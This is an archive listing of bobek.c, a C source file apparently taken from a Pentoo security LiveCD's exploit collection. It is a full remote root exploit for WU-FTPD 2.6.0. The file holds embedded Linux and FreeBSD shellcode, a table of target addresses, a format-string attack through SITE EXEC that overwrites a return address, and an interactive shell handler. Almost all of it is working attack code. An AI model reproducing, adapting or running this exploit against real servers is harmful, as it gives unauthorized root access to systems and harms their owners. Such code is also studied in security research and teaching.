home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / wuftpd / bobek.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  11KB  |  543 lines

---

1. /*
2.  * (c) 2000 venglin / b0f
3.  * http://b0f.freebsd.lublin.pl
4.  *
5.  * WUFTPD 2.6.0 REMOTE ROOT EXPLOIT (22/06/2000, updated: 05/08/2000)
6.  *
7.  * Idea and preliminary version of exploit by tf8
8.  *
9.  * Greetz: Lam3rZ, TESO, ADM, lcamtuf, karpio.
10.  * Dedicated to ksm.
11.  *
12.  * **PRIVATE**DO*NOT*DISTRIBUTE**
13.  */
14.  
15. #include <stdio.h>
16. #include <stdlib.h>
17. #include <stdarg.h>
18. #include <string.h>
19. #include <sys/types.h>
20. #include <sys/socket.h>
21. #include <netinet/in.h>
22. #include <netdb.h>
23. #include <unistd.h>
24. #include <arpa/inet.h>
25.  
26.  
27. #define repln    if (getreply(0) < 0) return -1
28. #define replv    if (getreply(1) < 0) return -1
29.  
30. #ifdef DEBUG
31. #define repl replv
32. #else
33. #define repl repln
34. #endif
35.  
36. char usage[] = "usage: bobek [-l login] [-o port] [-f retofs] [-s retlocofs]\n\t<-t type> <hostname>";
37. char recvbuf[BUFSIZ], sendbuf[BUFSIZ];
38. FILE *cin, *cout;
39.  
40. char linuxcode[]= /* Lam3rZ chroot() code */
41.     "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
42.     "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
43.     "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x27\xcd"
44.     "\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb"
45.     "\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e"
46.     "\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09"
47.     "\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88"
48.     "\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
49.     "\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31"
50.     "\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30\x62\x69\x6e"
51.     "\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x69"
52.     "\x6e\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x65"
53.     "\x2e\x63\x6f\x6d";
54.  
55. char bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
56.     "\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
57.     "\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
58.     "\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\x01\x53\x53\xb0\x88"
59.     "\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80\x31"
60.     "\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31"
61.     "\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75\xf1"
62.     "\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd\x80"
63.     "\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
64.     "\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
65.     "\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53\x53"
66.     "\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\x30\x62\x69\x6e\x30"
67.     "\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x69\x6e"
68.     "\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x65\x2e"
69.     "\x63\x6f\x6d";
70.  
71. struct platforms
72. {
73.     char *os;
74.     char *version;
75.     char *code;
76.     int align;
77.     int eipoff;
78.     long ret;
79.     long retloc;
80.     int sleep;
81. };
82.  
83. struct platforms targ[] =
84. {
85.     { "FreeBSD 3.4-STABLE", "2.6.0-ports", bsdcode, 2, 1024, 0x80b1f10, 0xbfbfcc04, 0 },
86.     { "FreeBSD 5.0-CURRENT", "2.6.0-ports", bsdcode, 2, 1024, 0x80b1510, 0xbfbfec0c, 0 },
87.     { "FreeBSD 3.4-STABLE", "2.6.0-packages", bsdcode, 2, 1024, 0x80b1510, 0xbfbfe798, 0 },
88.     { "FreeBSD 3.4-STABLE", "2.6.0-venglin", bsdcode, 2, 1024, 0x807078c, 0xbfbfcc04, 0 },
89.     { "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffcf74, 0 },
90.     { "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffd074, 0 },
91.     { "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffcf84, 0 },
92.     { "RedHat Linux 6.2", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffd04c, 0 },
93.     { "RedHat Linux 6.2-SMP", "2.6.0-RPM", linuxcode, 2, 1024, 0x80759e0, 0xbfffd0e4, 0 },
94.     { NULL, NULL, NULL, 0, 0, 0, 0 }
95. };
96.  
97. long getip(name)
98. char *name;
99. {
100.     struct hostent *hp;
101.     long ip;
102.     extern int h_errno;
103.  
104.     if ((ip = inet_addr(name)) < 0)
105.     {
106.         if (!(hp = gethostbyname(name)))
107.         {
108.             fprintf(stderr, "gethostbyname(): %s\n",
109.                 strerror(h_errno));
110.             exit(1);
111.         }
112.         memcpy(&ip, (hp->h_addr), 4);
113.     }
114.  
115.     return ip;
116. }
117.  
118. int connecttoftp(host, port)
119. char *host;
120. int port;
121. {
122.     int sockfd;
123.     struct sockaddr_in cli;
124.  
125.     bzero(&cli, sizeof(cli));
126.     cli.sin_family = AF_INET;
127.     cli.sin_addr.s_addr=getip(host);
128.     cli.sin_port = htons(port);
129.  
130.     if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
131.     {
132.         perror("socket");
133.         return -1;
134.     }
135.  
136.     if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0) 
137.     {
138.                 perror("connect");
139.         close(sockfd);
140.         return -1;
141.     }
142.  
143.     cin = fdopen(sockfd, "r");
144.     cout = fdopen(sockfd, "w");
145.  
146.     if (!cin || !cout)
147.     {
148.         close(sockfd);
149.         return -1;
150.     }
151.  
152.     return sockfd;
153. }
154.  
155. int command(const char *fmt, ...)
156. {
157.     char buf1[BUFSIZ], buf2[BUFSIZ*2], *p, *q;
158.  
159.     va_list args;
160.  
161.     if (!cout)
162.         return -1;
163.  
164.     bzero(buf1, BUFSIZ);
165.     bzero(buf2, BUFSIZ*2);
166.  
167.     va_start(args, fmt);
168.     vsnprintf(buf1, BUFSIZ, fmt, args);
169.     va_end(args);
170.  
171.     for (p=buf1,q=buf2;*p;p++,q++)
172.     {
173.         if (*p == '\xff')
174.         {
175.             *q++ = '\xff';
176.             *q = '\xff';
177.         }
178.         else
179.             *q = *p;
180.     }
181.  
182.     fprintf(cout, "%s", buf2);
183.  
184. #ifdef DEBUG
185.     fprintf(stderr, "--> ");
186.     fprintf(stderr, "%s", buf2);
187.     fputc('\n', stderr);
188. #endif
189.  
190.     fputs("\r\n", cout);
191.     (void)fflush(cout);
192.     return 0;
193. }
194.  
195. int getreply(v)
196. int v;
197. {
198.     if (!(fgets(recvbuf, BUFSIZ, cin)))
199.         return -1;
200.  
201.     if (v)
202.         fprintf(stderr, "<-- %s", recvbuf);
203.  
204.     return 0;
205. }
206.  
207. int logintoftp(login, passwd)
208. char *login, *passwd;
209. {
210.     do
211.         repl;
212.     while (strncmp(recvbuf, "220 ", 4));
213.  
214.     if ((command("USER %s", login)) < 0)
215.         return -1;
216.  
217.     repl;
218.  
219.     if (strncmp(recvbuf, "331", 3))
220.     {
221.         puts(recvbuf);
222.         return -1;
223.     }
224.  
225.     if ((command("PASS %s", passwd) < 0))
226.         return -1;
227.  
228.     do
229.         repl;
230.     while (strncmp(recvbuf, "230 ", 4));
231.  
232.     return 0;
233. }
234.  
235. int checkvuln(void)
236. {
237.     command("SITE EXEC %%p");
238.     repl;
239.  
240.     if(strncmp(recvbuf, "200-", 4))
241.         return -1;
242.  
243.     if(strncmp(recvbuf+4, "0x", 2))
244.         return -1;
245.  
246.     repl;
247.  
248.     return 0;
249. }
250.  
251. int findeip(eipoff, align)
252. int eipoff, align;
253. {
254.     int i, j, off;
255.     char *p1;
256.     char eip1[10], eip2[10];
257.  
258.     for (i=eipoff;;i+=8)
259.     {
260.         fprintf(stderr, "at offset %d\n", i);
261.         strcpy(sendbuf, "SITE EXEC ");
262.  
263.         for (j=0;j<align;j++) strcat(sendbuf, "a");
264.         strcat(sendbuf, "abcd");
265.  
266.         for (j=0;j<eipoff/8;j++) strcat(sendbuf, "%%.f");
267.         for (j=0;j<(i-eipoff)/8;j++) strcat(sendbuf, "%%d%%d");
268.         strcat(sendbuf, "|%%.8x|%%.8x");
269.  
270.         if (command(sendbuf) < 0)
271.             return -1;
272.  
273.         repl;
274.  
275.         if (!(p1 = strchr(recvbuf, '|')))
276.             return -1;
277.  
278.         strncpy(eip1, p1+1, 8);
279.         strncpy(eip2, p1+10, 8);
280.  
281.         eip1[8] = eip2[8] = '\0';
282.  
283.         if (!(strcmp(eip1, "64636261")))
284.         {
285.             off = i;
286.             break;
287.         }
288.  
289.         if (!(strcmp(eip2, "64636261")))
290.         {
291.             off = i + 4;
292.             break;
293.         }
294.  
295.         repl;
296.     }
297.  
298.     repl;
299.  
300.     return off;
301. }
302.  
303. char *putshell(type)
304. int type;
305. {
306.     static char buf[400];
307.     int noplen;
308.  
309.     char *code = targ[type].code;
310.  
311.     noplen = sizeof(buf) - strlen(code) - 2;
312.  
313.     memset(buf, 0x90, noplen);
314.     buf[noplen+1] = '\0';
315.     strcat(buf, code);
316.  
317.     return buf;
318. }
319.  
320. int overwrite(ptr, off, align, retloc, eipoff)
321. long ptr, retloc;
322. int off, align, eipoff;
323. {
324.     int i, size = 0;
325.     char buf[100];
326.  
327.     fprintf(stderr, "RET: %p, RET location: %p,"
328.         " RET location offset on stack: %d\n",
329.         (void *)ptr, (void *)retloc, off);
330.  
331.     if (off >= 12)
332.     {
333.  
334.         strcpy(sendbuf, "SITE EXEC ");
335.  
336.         for (i=0;i<eipoff/8;i++) strcat(sendbuf, "%%.f");
337.         for (i=0;i<(off-eipoff-8)/8;i++) strcat(sendbuf, "%%d%%d");
338.  
339.         if (((off-eipoff-8) % 8) != 0) strcat(sendbuf, "%%d%%d");
340.  
341.         if (command(sendbuf) < 0)
342.             return -1;    
343.  
344.         repl;
345.  
346.         size = strlen(recvbuf+4) - 2;
347.  
348.         repl;
349.     }
350.  
351.     fprintf(stderr, "Reply size: %d, New RET: %p\n", size,
352.         (void *)(ptr-size));
353.  
354.     strcpy(sendbuf, "SITE EXEC ");
355.     for (i=0;i<align;i++) strcat(sendbuf, "a");
356.  
357.     sprintf(buf, "%c%c%c%c", ((int)retloc & 0xff),
358.         (((int)retloc & 0xff00) >> 8),
359.         (((int)retloc & 0xff0000) >> 16),
360.         (((int)retloc & 0xff000000) >> 24));
361.  
362.     strcat(sendbuf, buf);
363.  
364.     for (i=0;i<eipoff/8;i++) strcat(sendbuf, "%%.f");
365.     for (i=0;i<(off-eipoff-8)/8;i++) strcat(sendbuf, "%%d%%d");
366.  
367.     if (((off-eipoff-8) % 8) != 0) strcat(sendbuf, "%%d%%d");
368.  
369.     strcat(sendbuf, "%%.");
370.     sprintf(buf, "%d", (int)ptr-size);
371.     strcat(sendbuf, buf);
372.     strcat(sendbuf, "d%%n");
373.  
374.     if (command(sendbuf) < 0)
375.         return -1;
376.  
377.     return 0;
378. }
379.  
380. int sh(sockfd)
381. int sockfd;
382. {
383.     char buf[BUFSIZ];
384.     int c;
385.     fd_set rf, drugi;
386.     char cmd[] = "uname -a ; pwd ; id\n";
387.         
388.     FD_ZERO(&rf);
389.     FD_SET(0, &rf);
390.     FD_SET(sockfd, &rf);
391.     write(sockfd, cmd, strlen(cmd));
392.  
393.     while (1)
394.     {
395.         bzero(buf, BUFSIZ);
396.         memcpy (&drugi, &rf, sizeof(rf));
397.         select(sockfd+1, &drugi, NULL, NULL, NULL);
398.         if (FD_ISSET(0, &drugi))
399.         {
400.             c = read(0, buf, BUFSIZ);
401.             send(sockfd, buf, c, 0x4);
402.         }
403.  
404.         if (FD_ISSET(sockfd, &drugi))
405.         {
406.             c = read(sockfd, buf, BUFSIZ);
407.             if (c<0) return 0;
408.             write(1,buf,c);
409.         }
410.     }
411. }
412.  
413. int main(argc, argv)
414. int argc;
415. char **argv;
416. {
417.     extern int optind, opterr;
418.     extern char *optarg;
419.     int ch, type, port, eipoff, fd, retofs, retlocofs, align, i, retoff;
420.     long ret, retloc;
421.     char login[BUFSIZ], password[BUFSIZ];
422.  
423.     opterr = retofs = retlocofs = 0;
424.     strcpy(login, "ftp");
425.     type = -1;
426.     port = 21;
427.  
428.     while ((ch = getopt(argc, argv, "l:f:s:t:o")) != -1)
429.         switch((char)ch)    
430.         {
431.             case 'l':
432.                 strcpy(login, optarg);
433.                 break;
434.  
435.             case 't':
436.                 type = atoi(optarg);
437.                 break;
438.  
439.             case 'o':
440.                 port = atoi(optarg);
441.                 break;
442.  
443.             case 'f':
444.                 retofs = atoi(optarg);
445.                 break;
446.  
447.             case 's':
448.                 retlocofs = atoi(optarg);
449.                 break;
450.  
451.             case '?':
452.             default:
453.                 puts(usage);
454.                 exit(0);
455.         }
456.  
457.     argc -= optind;
458.     argv += optind;
459.  
460.     fprintf(stderr, "PanBobek v1.1 by venglin@freebsd.lublin.pl\n\n");
461.  
462.     if (type < 0)
463.     {
464.         fprintf(stderr, "Please select platform:\n");
465.         for (i=0;targ[i].os;i++)
466.         {
467.             fprintf(stderr, "\t-t %d : %s %s (%p / %p)\n", i,
468.                 targ[i].os, targ[i].version,
469.                 (void *)targ[i].ret,
470.                 (void *)targ[i].retloc);
471.         }
472.         exit(0);
473.     }
474.  
475.     fprintf(stderr, "Selected platform: %s with WUFTPD %s\n\n",
476.         targ[type].os, targ[type].version);
477.  
478.     eipoff = targ[type].eipoff;
479.     align = targ[type].align;
480.     ret = targ[type].ret;
481.     retloc = targ[type].retloc;
482.     retloc += retlocofs;
483.     ret += retofs;
484.  
485.     if (argc != 1)
486.     {
487.         puts(usage);
488.         exit(0);
489.     }
490.  
491.     strcpy(password, putshell(type));
492.  
493.     if ((fd = connecttoftp(*argv, port)) < 0)
494.     {    
495.         (void)fprintf(stderr, "Connection to %s failed.\n", *argv);
496.         exit(1);
497.     }
498.  
499.     (void)fprintf(stderr, "Connected to %s. Trying to log in.\n", *argv);
500.  
501.     if (logintoftp(login, password) < 0)
502.     {
503.         (void)fprintf(stderr, "Logging in to %s (%s) failed.\n",
504.             *argv, login);
505.         exit(1);
506.         }
507.  
508.     (void)fprintf(stderr, "Logged in as %s. Checking vulnerability.\n",
509.         login);
510.  
511.     sleep(targ[type].sleep);
512.  
513.     if (checkvuln() < 0)
514.     {
515.         (void)fprintf(stderr, "Sorry, this version isn't"
516.             " vulnerable or uses internal vsnprintf().\n");
517.         exit(1);
518.     }
519.  
520.     (void)fprintf(stderr, "Ok, trying to find offset (initial: %d)\n",
521.         eipoff);
522.  
523.     if ((retoff = findeip(eipoff, align)) < 0)
524.     {
525.         (void)fprintf(stderr, "\nError finding offset. Adjust"
526.             " align.\n");
527.         exit(1);
528.     }
529.  
530.     if (overwrite(ret, retoff, align, retloc, eipoff) < 0)
531.     {
532.         (void)fprintf(stderr, "Error overwriting RET addr.\n");
533.         exit(1);
534.     }
535.  
536.     fprintf(stderr, "Wait up to few minutes for reply. It depends on "
537.             "victim's CPU speed.\nEnjoy your shell.\n");
538.  
539.     sh(fd);
540.  
541.     exit(0);
542. }
543. /*                    www.hack.co.za   [21 November 2000]*/